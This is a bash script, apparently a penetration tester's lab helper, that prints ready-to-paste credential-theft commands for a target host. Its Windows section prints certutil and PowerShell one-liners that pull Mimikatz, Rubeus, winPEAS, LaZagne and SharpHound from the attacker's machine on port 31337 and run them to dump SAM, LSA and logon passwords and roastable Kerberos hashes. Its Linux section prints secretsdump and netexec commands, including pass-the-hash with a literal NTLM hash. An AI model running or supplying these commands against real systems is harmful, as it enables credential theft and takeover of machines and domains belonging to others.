#!/bin/bash

# Purpose of this script is to have handy copy/paste commands that can
# give us passwords or hashes

# Colors
GREEN='\033[0;32m' # Green
NC='\033[0m'       # No Color

TOOLS_PORT=31337


# Make this work for local lab also
if ip -4 a show tun0 &> /dev/null; then
    LHOST=$(ip -4 a show tun0 | grep -Po 'inet \K[\d.]+')
else
    LHOST=$(ip -4 a show wlan0 | grep -Po 'inet \K[\d.]+')
fi


if [ $# -eq 0 ]
then
  RHOST="10.10.10.10"
else
  RHOST="$1"
fi



cat << "EOF"
            _           _     
           (_)         (_)    
  _ __ ___  _ _ __ ___  _ ___ 
 | '_ ` _ \| | '_ ` _ \| / __|
 | | | | | | | | | | | | \__ \
 |_| |_| |_|_|_| |_| |_|_|___/
                              
                                                                                              
EOF

#https://patorjk.com/software/taag/#p=display&f=Big&t=Persistence

echo -e "LHOST=${GREEN}$LHOST${NC}"
echo -e "RHOST=${GREEN}$RHOST${NC}"
echo -e "TOOLS_PORT=${GREEN}$TOOLS_PORT${NC}"
echo
echo

echo '********** Windows **********'
echo
echo "# Mimikatz"
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/mimikatz.exe C:\Windows\Temp\mimikatz.exe && C:\Windows\Temp\mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::sam\" \"exit\""
echo
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/mimikatz.exe C:\Windows\Temp\mimikatz.exe && C:\Windows\Temp\mimikatz.exe \"privilege::debug\" \"token::elevate\" \"sekurlsa::logonpasswords\" \"exit\""
echo
echo "iwr -Uri http://$LHOST:$TOOLS_PORT/windows/mimikatz.exe -OutFile C:\Windows\Temp\mimikatz.exe | & C:\Windows\Temp\mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::sam\" \"exit\""
echo
echo "iwr -Uri http://$LHOST:$TOOLS_PORT/windows/mimikatz.exe -OutFile C:\Windows\Temp\mimikatz.exe | & C:\Windows\Temp\mimikatz.exe \"privilege::debug\" \"token::elevate\" \"sekurlsa::logonpasswords\" \"exit\""
echo
echo
echo "# Rubeus (Needs domain user)"
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/Rubeus.exe C:\Windows\Temp\Rubeus.exe && C:\Windows\Temp\Rubeus.exe asreproast /nowrap"
echo
echo "iwr -Uri http://$LHOST:$TOOLS_PORT/windows/Rubeus.exe -OutFile C:\Windows\Temp\Rubeus.exe | C:\Windows\Temp\Rubeus.exe asreproast /nowrap"
echo
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/Rubeus.exe C:\Windows\Temp\Rubeus.exe && C:\Windows\Temp\Rubeus.exe kerberoast /nowrap"
echo
echo "iwr -Uri http://$LHOST:$TOOLS_PORT/windows/Rubeus.exe -OutFile C:\Windows\Temp\Rubeus.exe | C:\Windows\Temp\Rubeus.exe kerberoast /nowrap"
echo
echo "Winpeas"
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/winpeas/winPEASany.exe C:\Windows\Temp\winpeas.exe && C:\Windows\Temp\winpeas.exe"
echo "iwr -uri http://$LHOST:$TOOLS_PORT/windows/winpeas/winPEASany.exe -Outfile C:\Windows\Temp\winpeas.exe | C:\Windows\Temp\winpeas.exe"
echo
echo "Tools"
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/LaZagne.exe C:\Windows\Temp\LaZagne.exe"
echo "certutil.exe -urlcache -f http://$LHOST:$TOOLS_PORT/windows/SharpHound.ps1 C:\Windows\Temp\SharpHound.ps1"
echo
echo

echo '********** Linux **********'
echo
echo "# Dump secrets with Local user"
echo "python3 /home/kali/.local/bin/secretsdump.py username:password@$RHOST"
echo
echo "# Dump secrets with Domain user"
echo "python3 /home/kali/.local/bin/secretsdump.py domain/username:password@$RHOST"
echo
echo "nxc smb $RHOST -u username -p password --sam"
echo "nxc smb $RHOST -u username -p password --lsa"
echo "nxc smb $RHOST -u username -p password --sam --local-auth"
echo "nxc smb $RHOST -u username -p password --lsa --local-auth"
echo "nxc smb $RHOST -u administrator -H 184fb5e5178480be64824d4cd53b99ee --sam"
echo "nxc smb $RHOST -u administrator -H 184fb5e5178480be64824d4cd53b99ee --lsa"
echo
echo "# Get AS-REP roastable hashes (Needs users.txt)"
echo "nxc ldap $RHOST -u users.txt -p '' --asreproast ASREProastables.txt --kdc $RHOST"
echo
echo "# Get Kerberoastable hashes (Needs a domain username/password)"
echo "nxc ldap $RHOST -u <username> -p <password> --kerberoasting kerberoastables.txt --kdc $RHOST"
echo
echo